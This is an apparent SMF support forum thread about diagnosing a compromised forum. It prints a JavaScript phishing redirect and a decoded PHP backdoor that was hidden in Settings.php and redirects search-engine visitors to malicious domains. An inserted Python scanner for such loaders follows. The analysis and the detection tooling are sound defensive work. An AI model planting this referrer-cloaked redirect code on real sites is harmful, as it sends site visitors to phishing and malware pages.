problems with a Redirect Exploit on my site (mod related?)

Started by Gaming4JC, December 13, 2010, 08:46:31 PM

Gaming4JC

Hey all,
I just tested this twice to confirm.  The so-called Google Tagged MOD is malicious. >:(
In order to repeat the process go to Admin >> Package Manager >> Download Packages >> Simple Machines Third-party Mod Site >> Feature Enhancements >> Google Tagged. Once it has been downloaded all you have to do to root your site is click "Install Mod".
The url is: yoursmf-site.com/index.php?action=admin;area=packages;sa=install;package=google-tagged20rc3.zip

As soon as this is clicked you should get an insane amount of security warnings including a drive-by download from AVG, a warning on WebofTrust, and an attempted browser hijack to finditnow.osa.pl/atp/?said=3333&q=facebook which is a pathetic bing.com phishing site.

First, I'd like to know if my site is truly clean after my attempted removal of the plugin and if any information has been compromised from my members.
Secondly I think this plugin should be pulled from the repo ASAP!  :o

Please feel free to test it yourself to confirm.  :-\

Edit: Also wanted to let everyone know this is the latest RC4 I'm running, which is why I classify it as a bug since it should detect malicious plugins... or at least not have them in the main repo... xP

JBlaze

I've gone and checked the package, and there is nothing malicious at all.

Are you sure you don't have a virus/spyware on your computer? I'd run an anti-virus scan as well as ask your host for access logs and previous changes before you blindly accuse a mod of being malicious.
Jason Clemons
Former Team Member 2009 - 2012

Gaming4JC

100% positive it's the plugin. I tested it on several computers including Linux with NoScript. There's a redirect going on there.

Sites redirect in the following order...
antispyche.bij.pl (last about 2sec and goes to one of the following)
personalsuite-checker.in   
finditnow.osa.pl
info.com

FYI, I do computer repair and malware removal as a hobby. There's no malware on my box.  :D

JBlaze

Quote from: Gaming4JC on December 13, 2010, 09:12:25 PM
100% positive it's the plugin. I tested it on several computers including Linux with NoScript. There's a redirect going on there.
And I'm 100% positive it's not. I'm a former Customizer here and I've tested hundreds of mods. I've seen my share of bad packages and stuff.

Do what I said and run an anti-virus as well as talk to your host to see if there is a malicious script running on your server. IF that all comes back clean, then we can go from there.

Gaming4JC

Ok then, let's assume it's not. Then it must be the repository I am downloading from has been compromised. The day Ubuntu linux gets a worm without me entering a root password I'll eat my keyboard.  ::)

JBlaze

Quote from: Gaming4JC on December 13, 2010, 09:21:28 PM
Ok then, let's assume it's not. Then it must be the repository I am downloading from has been compromised. The day Ubuntu linux gets a worm without me entering a root password I'll eat my keyboard.  ::)
The repository you are downloading from is the simplemachines.org server. If said server has been exploited in any way, it would have been taken care of already, and a notice posted. 

Best thing you can do is what I said above. And now that I think of it, you can check your SMF source and template files for a rogue <script> tag that may be linking to above phishing site. This could have been added even before you attempted to install the Google Tagged package, and only showed up on the admin template.

My point is this: don't blame a simple package that has been on the mod site for years for a possible exploit on your site. Make sure you have covered all aspects of this yourself and done your research before accusing. I've double and triple checked the package, like I always do, and there is nothing malicious about it.

Gaming4JC

Well, let's put it this way. I install the mod and the redirect occurs, I uninstall it (only with the Firefox NoScript plugin, since it's impossible to do so without it) and it goes away. This has never happened with any other mod and I have a fairly fresh SMF install.

I realize you have examined it, but have you actually tried to install it? And if you want I can set you up a temporary admin account right now on my site to prove my point. There's no malicious scripts until it has been installed. I'll go ahead and run firebug on it just for the heck of it...  :P

JBlaze

Quote from: Gaming4JC on December 13, 2010, 09:33:06 PM
I realize you have examined it, but have you actually tried to install it?
That's part of examining mod packages ;)

Quote from: Gaming4JC on December 13, 2010, 09:33:06 PM
And if you want I can set you up a temporary admin account right now on my site to prove my point.
No thanks. All I need is a link to your site, and I can run a quick source check to see if there's any malicious JS that shouldn't be there.

Gaming4JC

Here you are, I left it half-way installed (on the server) so it's continually triggering the effect for anyone accessing the package manager right now.
http://forum.christiangamemaker.com

Here's a screenshot of my website getting redirected as seen on my desktop. (ahem, I can take one from Win7 too if you don't like the radically modified interface)
http://img80.imageshack.us/img80/4628/screenshot1ba.png

I'm not seeing the script on firebug, but maybe I'm missing something. NoScript recently failed to stop it as well... I can't help but think I just got an update to make their hack a little better. At least I know it's not my computer, it's affecting other accounts as well.

Edit: Finding some odd stuff using FireCookie, I might be wrong but it seems to be related to a php session cookie redirect? Still looking into it.

Gaming4JC

Minor updates, I have figured out a little bit more. It is indeed something to do with cookies and cache, though it's even more advanced than anything I care to comprehend at the moment. The redirect has several stages. Initially it points your browser to a blank page which then redirects with a typical javascript on the proceeding page.

As you can see in the photo the real web address gets a "failed" request, followed by the malicious redirect.


<SCRIPT LANGUAGE="JavaScript">
<!--
// Second stage of the redirect: 100 ms after load, if this page sits inside a
// frameset, point the parent window at the phishing URL.
setTimeout ("changePage()", 100);
function changePage() {
    if (self.parent.frames.length != 0)
        self.parent.location="finditnow.osa.pl/atp/?said=3333g&q=facebook";
}
// -->
</SCRIPT>


Still not seeing how it all comes in to play... you?

Edit: I'm not going to put my users at risk anymore, though I'm hoping it's actually out. I've removed the package and changed my password. Let me know if you find anything else I should know about.

Kindred

not an SMF bug (so it does not belong in the bug reports) and not actually a problem with the mod...

I am moving this to general support and changing the title so it does not frighten people who skim the title.
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

Gaming4JC

Well, thanks for pointing out that's it's evidently not the mod.... however, that troubles me even more. If it's not the mod what is it, and why is it triggered by this mod specifically?

I'm still not too comfortable for my members' sake.


TeeJay

Check your .htaccess file
Not just in the root folder of your forum but in the root of your server

It's probably been hacked and a malicious redirect in your .htaccess file which is conditional on the referring URL

e.g. if you try to follow a link from Google to your site it will redirect, if you type the url in your browser it won't

Gaming4JC

TeeJay, pretty sure you are correct about one thing. It's a low level redirect using 302, 302, and then 301.
I mistakenly thought the problem was resolved, it is definitely not. I used RefControl in Firefox to spoof the referrer as a Google search, the exploit happens every time. I have also checked all other pages on my site, it doesn't occur. It occurs only in the forums sub-domain. I contacted my hosting provider which scanned the server and said there are no rogue .htaccess files they could see, and since it happens only in the forum they said it was most definitely a weakness in the forum software. They did mention that if there is a file, even though they couldn't find it, it was triggered through this web application. (everyone points finger at SMF xD )

This malware described:
http://blog.unmaskparasites.com/2008/12/08/unmasking-the-antivirus-2009-htaccess-exploit/

Malware on the site detected:
http://www.unmaskparasites.com/security-report/?page=forum.christiangamemaker.com

There has to be a .htaccess file somewhere, but I can't find it anywhere on the server. I even did a "*.htaccess" file search on Ubuntu's FTP crawler. Nothing out of the ordinary.  ???

I'm attempting to get help from other security sources ASAP!  :'(

Kindred

no, it doesn't have to be an .htaccess....   There is redirect code that can be inserted into the php files that will do the same thing.

And let's be clear....   the inserted code may have been done to SMF files, but, until I hear otherwise, there are no known security holes in SMF, which means that the security weakness was not actually in SMF itself.
(remember, it could be in ANY software on your web server, just because SMF was affected does not mean it was the avenue)

Look in Settings.php, index.php and your theme index.template.php files for any sort of redirect code...  especially any base64 encoded crap...   SMF does not use base64 encoded code, so if you find any, it is suspect.

if not those files, then possibly others...

basically, to be completely safe, what you should do is, once you have verified that Settings.php is clean, save a copy to your local PC, delete the files out of your forum root, all of the files and sub-directories in your Sources directory and remove all of the Themes sub-directories.
Using the large upgrade package of SMF, re-upload the entire forum file set, then re-upload the Settings.php that you saved.

This will reset your forum to a default installation (you will not lose any messages or members, because those are in the database, not the files)

You can then re-apply mods and themes from clean, newly downloaded copies.


Yes.... this is a bother, but it is the easiest way to be certain that all of your files are clean.

Gaming4JC

Finally found the little gem, it compromised the header on Settings.php.
<?php                                         eval(base64_decode("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"));

I'll be doing a complete full-upgrade as advised.

Guess I should change all my passwords? :s
Furthermore how do I know they haven't tampered in the SQL database?...

Kindred

you don't know for sure.... but there is very little they can do with the database itself (I think)

Usually, they don't bother with the db, they only care about the files.

Gaming4JC

Ok, thanks. Also I think I might attempt to re-create the exploit on another server to test the plugins I was using.

Btw here's the code unmasked:
error_reporting(0);                         // hide any PHP notices that would expose the injection
$nccv=headers_sent();
if (!$nccv){                                // a Location header only works if nothing has been output yet
  $referer=$_SERVER['HTTP_REFERER'];
  $ua=$_SERVER['HTTP_USER_AGENT'];          // read but never used in this sample
  // only fire for visitors arriving from a search engine; the owner typing the URL never sees it
  if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"ask.com")) {
    // meant to skip webmaster-style operator searches (site:, cache:, inurl:); as written the
    // chain of 'or' only skips when all three strings appear in the referrer
    if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){
      header("Location: antispyche.bij.pl");
      exit();
    }
  }
}

What a nasty piece of crap... xP
That explains why the host couldn't find it, it was embedded into the php itself as you said.
The file was modified December 20th, 2010.

Google also mentions it affected phpBB2 and vBulletin.
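The three checks the thread converges on, the referrer-keyed .htaccess rule TeeJay describes, the sweep of Settings.php, index.php and theme files for base64/eval that Kindred recommends, and the unmasking of the payload above, can be done in one pass. The script below is an added example and is not SMF code or code from this thread. It builds a constructed forum tree in a temporary directory (an infected Settings.php carrying the payload decoded above, a clean index.php, and a rogue .htaccess whose redirect target example.invalid is a placeholder), then scans it. It goes beyond the single base64 layer seen on the page by following nested eval(base64_decode()) wrappers, which is an assumption about how such loaders are commonly stacked, and it flags files modified after a given time, since the post notes the file's modification date.

```python
import base64
import os
import re
import shutil
import tempfile
import time

# Loader shape from the thread: eval(base64_decode("...")) at the top of a PHP file.
LOADER_RE = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*\)\s*\)', re.I)
# A rewrite rule keyed on the referrer, the .htaccess variant TeeJay describes.
HTACCESS_RE = re.compile(r'RewriteCond\s+%\{HTTP_REFERER\}', re.I)
# Strings in a decoded payload that point to a referrer-cloaked redirect.
INDICATORS = ("error_reporting(0)", "headers_sent", "HTTP_REFERER", "HTTP_USER_AGENT", "header(", "Location:")
SEARCH_ENGINES = ("google", "yahoo", "bing", "ask.com")

# Constructed sample: the payload decoded in the thread, wrapped in two base64 layers (assumed nesting).
SAMPLE_PAYLOAD = r'''error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"ask.com")) {
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: antispyche.bij.pl");
exit();
}
}
}'''
INNER_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
OUTER_B64 = base64.b64encode(('eval(base64_decode("%s"));' % INNER_B64).encode()).decode()


def unmask(payload_b64, max_depth=5):
    """Decode a base64 payload, following nested eval(base64_decode()) layers; returns each layer."""
    layers, current = [], payload_b64
    for _ in range(max_depth):
        try:
            decoded = base64.b64decode(re.sub(r"\s+", "", current), validate=True).decode("latin-1")
        except ValueError:  # binascii.Error is a ValueError: not base64, stop here
            break
        layers.append(decoded)
        inner = LOADER_RE.search(decoded)
        if not inner:
            break
        current = inner.group(1)
    return layers


def classify(php_source):
    """Report which cloaking indicators a decoded payload contains."""
    found = [i for i in INDICATORS if i in php_source]
    engines = [e for e in SEARCH_ENGINES if e in php_source.lower()]
    return {"indicators": found, "search_engines": engines,
            "cloaked_redirect": "HTTP_REFERER" in found and "Location:" in found and bool(engines)}


def scan_content(name, content):
    """Findings for one file as (kind, detail) tuples."""
    out = []
    if name == ".htaccess" and HTACCESS_RE.search(content):
        out.append(("htaccess-referrer-rule", "RewriteCond keyed on HTTP_REFERER"))
    for m in LOADER_RE.finditer(content):
        layers = unmask(m.group(1))
        verdict = classify(layers[-1] if layers else "")
        kind = "cloaked-redirect-backdoor" if verdict["cloaked_redirect"] else "obfuscated-eval"
        out.append((kind, "%d layer(s); indicators: %s" % (len(layers), ", ".join(verdict["indicators"]))))
    return out


def scan_tree(root, modified_since=None):
    """Walk root; flag PHP/.htaccess content and any file touched at or after modified_since (epoch)."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            mtime = os.path.getmtime(path)
            if modified_since is not None and mtime >= modified_since:
                findings.append((rel, "recently-modified", time.ctime(mtime)))
            if name == ".htaccess" or name.endswith(".php"):
                with open(path, encoding="latin-1") as f:
                    content = f.read()
                findings.extend((rel, kind, detail) for kind, detail in scan_content(name, content))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed forum root: infected Settings.php, clean index.php, rogue .htaccess."""
    files = {
        "Settings.php": '<?php eval(base64_decode("%s"));\n$db_server = \'localhost\';\n' % OUTER_B64,
        "index.php": "<?php\n// stand-in for the clean SMF entry point\nrequire_once('Settings.php');\n",
        ".htaccess": "RewriteEngine On\nRewriteCond %{HTTP_REFERER} (google|bing) [NC]\n"
                     "RewriteRule .* http://example.invalid/ [R=302,L]\n",
    }
    for name, body in files.items():
        with open(os.path.join(root, name), "w", encoding="latin-1") as f:
            f.write(body)


def demo():
    """Build the sample tree in a temp dir, scan it, clean up; returns the sorted findings."""
    root = tempfile.mkdtemp(prefix="smf-scan-")
    try:
        build_sample_tree(root)
        return scan_tree(root, modified_since=time.time() - 60)
    finally:
        shutil.rmtree(root)
```

Run scan_tree against a real forum root with modified_since set to the last known-good date; a clean SMF tree yields no obfuscated-eval or cloaked-redirect-backdoor findings, and a Settings.php hit is exactly the case above. The scanner finds the loader pattern only; a payload written without base64, or an .htaccess outside the forum tree, still needs the manual file comparison Kindred describes.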

Kindred

what mods did you have installed?
What other software are you running on the site?

If you're on a shared hosting, and they are not running properly configured partitions, someone else's account may have allowed them access to your account.
